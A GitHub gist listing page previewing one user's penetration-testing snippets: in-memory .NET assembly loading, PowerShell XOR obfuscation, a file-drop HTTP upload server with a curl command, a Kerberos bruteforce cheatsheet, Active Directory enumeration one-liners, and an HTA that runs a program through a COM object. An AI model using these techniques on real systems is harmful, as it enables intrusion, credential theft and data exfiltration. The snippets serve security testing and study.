Skip to content

Instantly share code, notes, and snippets.

View binarytrails's full-sized avatar
:octocat:
0x3a0x29

binarytrails

:octocat:
0x3a0x29
135 followers · 189 following
View GitHub Profile
@binarytrails
binarytrails / TestAssembly.cs
Created August 4, 2021 13:35 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@binarytrails
binarytrails / snippet.cs
Created August 4, 2021 14:16 — forked from silentbreaksec/snippet.cs
Convert C# EXE to Assembly
[DllImport("shell32.dll", SetLastError = true)]
static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs);
public static string[] CommandLineToArgs(string commandLine)
{
int argc;
var argv = CommandLineToArgvW(commandLine, out argc);
if (argv == IntPtr.Zero)
throw new System.ComponentModel.Win32Exception();
try
@binarytrails
binarytrails / xor.ps1
Created October 29, 2021 19:52 — forked from gabemarshall/xor.ps1
Simple Encrypt and Decrypt with Powershell
# Not secure by any means, just a PoC for XOR'ing data using powershell
# Credit to http://stackoverflow.com/questions/3478954/code-golf-xor-encryption
$enc = [System.Text.Encoding]::UTF8
function xor {
param($string, $method)
$xorkey = $enc.GetBytes("secretkey")
if ($method -eq "decrypt"){
@binarytrails
binarytrails / http_server.py
Last active November 8, 2021 23:34
smol HTTP Server to drop files
#!/usr/env python3
import http.server
import socketserver
import io
import cgi
# Change this to serve on a different port
PORT = 80
# curl -F "[email protected]" http://<ip>:80/file.txt
@binarytrails
binarytrails / kerberos_attacks_cheatsheet.md
Created January 19, 2022 21:25 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@binarytrails
binarytrails / recon-ng_keys.md
Created February 14, 2022 20:03
Recon-ng Keys Setup

Instructions for Recon-NG v4.8.3:

API Keys:

  1. bing_api (optional $$$) - Sign up here (I chose the free plan), agree to all the terms until you get to "Thank You", then go here to view the key. (free account: 5000 transactions per month)

  2. builtwith_api - Go here and sign up. Once you enter an email and password, it will show you the API key

  3. censysio_id - Go here and sign up. Once you register, confirm your account by clicking on the link in the email. Then login and go here to view the "ID" and "Secret"

@binarytrails
binarytrails / 1) Active Directory One Liners
Created March 28, 2022 23:11 — forked from w00tc/1) Active Directory One Liners
Some Pentesting Notes
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
@binarytrails
binarytrails / python3_https_server.py
Created June 16, 2022 18:33 — forked from stephenbradshaw/python3_https_server.py
Python 3 Simple HTTPS server
#!/usr/bin/env python3
# python3 update of https://gist.github.com/dergachev/7028596
# Create a basic certificate using openssl:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Or to set CN, SAN and/or create a cert signed by your own root CA: https://thegreycorner.com/pentesting_stuff/writeups/selfsignedcert.html
import http.server
import ssl
httpd = http.server.HTTPServer(('127.0.0.1', 443), http.server.SimpleHTTPRequestHandler)
@binarytrails
binarytrails / simple-gpg-enc.go
Created July 26, 2022 04:11 — forked from stuart-warren/simple-gpg-enc.go
golang gpg/openpgp encryption/decryption example
package main
import (
"bytes"
"code.google.com/p/go.crypto/openpgp"
"encoding/base64"
"io/ioutil"
"log"
"os"
)
@binarytrails
binarytrails / com.hta
Created January 25, 2023 20:16 — forked from OlivierLaflamme/com.hta
com.hta
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>